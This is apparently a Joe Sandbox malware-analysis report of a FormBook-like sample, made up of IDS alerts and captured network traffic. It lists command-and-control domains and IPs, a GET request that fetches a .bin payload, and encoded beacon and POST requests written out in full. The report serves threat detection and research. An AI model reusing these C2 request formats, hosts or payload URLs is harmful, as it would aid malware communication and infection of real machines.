        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49898 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49921 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49897 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49843 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49901 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49844 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49910 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49906 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49926 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49847 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49918 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49859 -> 172.67.166.145:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49863 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49876 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49929 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49883 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49902 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49908 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49917 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49930 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2035065 - Severity 1 - ET MALWARE W32/Emotet.v4 Checkin Fake 404 Payload Response : 103.247.8.53:80 -> 192.168.11.20:49897
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49891 -> 76.223.54.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49932 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49934 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49933 -> 84.32.84.32:80
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.518729.xyz
        Source: Joe Sandbox ViewIP Address: 185.230.15.3 185.230.15.3
        Source: Joe Sandbox ViewIP Address: 18.183.3.45 18.183.3.45
        Source: Joe Sandbox ViewIP Address: 76.223.54.146 76.223.54.146
        Source: Joe Sandbox ViewIP Address: 76.223.54.146 76.223.54.146
        Source: Joe Sandbox ViewASN Name: VIALIS-MOSELLELocatedinMetzFranceFR VIALIS-MOSELLELocatedinMetzFranceFR
        Source: Joe Sandbox ViewASN Name: TELINEABA TELINEABA
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49840 -> 199.103.62.205:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: GET /EiopsiA213.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.groupriam.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /enra/?wXB=brv4Erb&ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1Host: www.foundation-repair.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb HTTP/1.1Host: www.asa-malukuutara.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /o0e7/?ij60MtY=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&wXB=brv4Erb HTTP/1.1Host: www.meetfactory.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /s1mg/?ij60MtY=2QViuhW/NYaw5nxi+F1oVZq46szrrR71oUxOni/Qn+PFEj/1SakqFOMu9uwTuSiQaklPQGQrKMR1DX8jJ/FrQ8LNcsmQ9XMkBTdB/FoVvRnsRxC4QNxtOLg=&wXB=brv4Erb HTTP/1.1Host: www.518729.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb HTTP/1.1Host: www.cachsoicautdtc.bestAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /p1v4/?ij60MtY=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY=&wXB=brv4Erb HTTP/1.1Host: www.itemfilterhub.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /veti/?ij60MtY=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&wXB=brv4Erb HTTP/1.1Host: www.bullbord.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /y82c/?wXB=brv4Erb&ij60MtY=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M= HTTP/1.1Host: www.cannulafactory.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /pcjw/?ij60MtY=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&wXB=brv4Erb HTTP/1.1Host: www.7ddw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /ns8q/?wXB=brv4Erb&ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s= HTTP/1.1Host: www.home-check.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /enra/?ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=&wXB=brv4Erb HTTP/1.1Host: www.foundation-repair.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /c0kl/?wXB=brv4Erb&ij60MtY=AxZR1MxN1yP04/KkfJjqNmRSK4d8g2rgChYpgYbN8LwS/ds0321h0MeEKpKCay63h/JFzZR/nOfV69IulQUTnqrvqwrwGbRyvD357dhiEinhnUxdss5AyLg= HTTP/1.1Host: www.emeluzunmoda.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /mktg/?ij60MtY=0TalvP/u8kBxCEcVC8ZYLDfWzg1d8ZMLdJUcZNeUjcCfUnJGBGp8dbleblgtUVXijVAfatBw5nkrSCpMHneIWtcqoMWdglrJlT3qBoY6Uu70toyjn3om774=&wXB=brv4Erb HTTP/1.1Host: www.ayypromo.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /gir9/?ij60MtY=f5fgxEQYyH9aCEvnqRNhj/uGI07axwFwhdkCg+bZ+BEtnM1/7SlBYCrjg9utQFPLrd0Y68zwkqIMf6pHdwjKMQmtDey6vcSJt3zCtqxSD+6F6gKu0jTr2I8=&wXB=brv4Erb HTTP/1.1Host: www.magicface.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /enra/?wXB=brv4Erb&ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1Host: www.foundation-repair.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb HTTP/1.1Host: www.asa-malukuutara.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /o0e7/?ij60MtY=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&wXB=brv4Erb HTTP/1.1Host: www.meetfactory.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /s1mg/?ij60MtY=2QViuhW/NYaw5nxi+F1oVZq46szrrR71oUxOni/Qn+PFEj/1SakqFOMu9uwTuSiQaklPQGQrKMR1DX8jJ/FrQ8LNcsmQ9XMkBTdB/FoVvRnsRxC4QNxtOLg=&wXB=brv4Erb HTTP/1.1Host: www.518729.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb HTTP/1.1Host: www.cachsoicautdtc.bestAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /p1v4/?ij60MtY=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY=&wXB=brv4Erb HTTP/1.1Host: www.itemfilterhub.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /veti/?ij60MtY=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&wXB=brv4Erb HTTP/1.1Host: www.bullbord.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /y82c/?wXB=brv4Erb&ij60MtY=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M= HTTP/1.1Host: www.cannulafactory.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /pcjw/?ij60MtY=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&wXB=brv4Erb HTTP/1.1Host: www.7ddw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /ns8q/?ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s=&tvodg=2Zld-RLxEfN HTTP/1.1Host: www.home-check.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficDNS traffic detected: DNS query: www.groupriam.com
        Source: global trafficDNS traffic detected: DNS query: www.foundation-repair.biz
        Source: global trafficDNS traffic detected: DNS query: www.asa-malukuutara.com
        Source: global trafficDNS traffic detected: DNS query: www.sedezne-blazine.shop
        Source: global trafficDNS traffic detected: DNS query: www.meetfactory.biz
        Source: global trafficDNS traffic detected: DNS query: www.518729.xyz
        Source: global trafficDNS traffic detected: DNS query: www.cachsoicautdtc.best
        Source: global trafficDNS traffic detected: DNS query: www.itemfilterhub.shop
        Source: global trafficDNS traffic detected: DNS query: www.bullbord.top
        Source: global trafficDNS traffic detected: DNS query: www.cannulafactory.top
        Source: global trafficDNS traffic detected: DNS query: www.7ddw.top
        Source: global trafficDNS traffic detected: DNS query: www.home-check.shop
        Source: global trafficDNS traffic detected: DNS query: www.emeluzunmoda.online
        Source: global trafficDNS traffic detected: DNS query: www.ayypromo.shop
        Source: global trafficDNS traffic detected: DNS query: www.magicface.shop
        Source: global trafficDNS traffic detected: DNS query: www.hypepgbet.online
        Source: global trafficDNS traffic detected: DNS query: www.multfiber.net
        Source: unknownHTTP traffic detected: POST /21hf/ HTTP/1.1Host: www.asa-malukuutara.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.asa-malukuutara.comCache-Control: no-cacheConnection: closeContent-Length: 204Content-Type: application/x-www-form-urlencodedReferer: http://www.asa-malukuutara.com/21hf/User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>Data Raw: 69 6a 36 30 4d 74 59 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 58 37 4c 61 69 54 6b 6b 6c 53 4c 43 52 35 68 63 4b 2f 46 54 61 30 6e 76 50 71 6b 6c 63 6a 50 37 41 45 58 44 77 75 52 73 75 78 35 51 31 6e 65 71 42 58 58 68 45 4f 51 54 4d 47 58 46 61 37 4c 36 51 50 45 42 4d 6c 36 33 51 56 35 77 6b 4b 59 74 58 41 77 76 4a 5a 61 34 39 37 71 6e 50 6a 49 31 58 6d 32 55 71 6e 45 31 4c 75 6a 34 56 66 54 55 68 48 6b 7a 61 50 72 42 37 4b 46 56 76 67 64 6f 7a 68 2b 67 6f 77 39 63 54 59 76 5a 53 5a 5a 31 34 62 69 73 2b 6c 62 62 49 33 51 77 78 68 5a 32 36 46 42 4c 35 43 49 70 6d 44 4f 4f 79 75 65 4e 35 56 77 4f 41 3d 3d Data Ascii: ij60MtY=k3lrS/T5T2y61X7LaiTkklSLCR5hcK/FTa0nvPqklcjP7AEXDwuRsux5Q1neqBXXhEOQTMGXFa7L6QPEBMl63QV5wkKYtXAwvJZa497qnPjI1Xm2UqnE1Luj4VfTUhHkzaPrB7KFVvgdozh+gow9cTYvZSZZ14bis+lbbI3QwxhZ26FBL5CIpmDOOyueN5VwOA==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 05:58:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 12523Content-Type: text/html; charset=UTF-8Data Raw: 53 06 02 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 61 0a 67 16 08 65 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 24 79 b6 24 d9 e7 94 2c f7 1e 19 7a 8f 64 e8 e6 f7 ee 83 ff 0b c5 06 99 b8 7b c1 f6 10 60 16 2c 62 92 6c 12 d7 70 79 7a 61 80 c2 89 37 a2 20 4a f6 31 4c 6b b7 bf cf ba eb 12 44 44 45 40 4d da 7b 89 cb 63 f3 9a 60 a9 46 79 31 91 a9 e1 8c 0d fd 41 ec 93 bc 55 22 99 ef ab 0c d5 66 f7 42 62 1b 43 c9 29 20 75 5b c6 d4 b2 d9 bd ee 17 39 09 57 03 44 62 5d 94 80 c1 d5 9c 6b c0 a4 8b 57 48 77 f4 c7 e3 1c 07 73 4f 8b 42 bc 6f ac 50 ce cb b5 c4 73 59 58 0a 88 1c da 0d 45 5d 15 f5 10 81 04 53 06 57 2a 81 4b 7f 8b 17 05 60 a3 5b 7c 4c 2c 0e ea b2 1b 8c 41 3a 24 34 2e 92 1a 2f 02 53 92 81 83 db a0 eb 3d 70 2c 82 e2 fb c7 13 a2 84 bb c7 3b fa e5 ee f3 8f ef fb 3c 7b 49 f3 0f ad e9 5e c1 ea b6 5a 34 9d 43 7a 19 5b ed eb fd 62 b7 0d 2f 3d 0c 95 53 f4 a0 da e3 eb f1 e8 95 55 53 3c 28 32 f5 d2 02 e2 69 5c 17 e5 86 21 6f 15 19 29 d4 cc 3b 82 df b4 6e fa 62 40 2e d9 62 8e 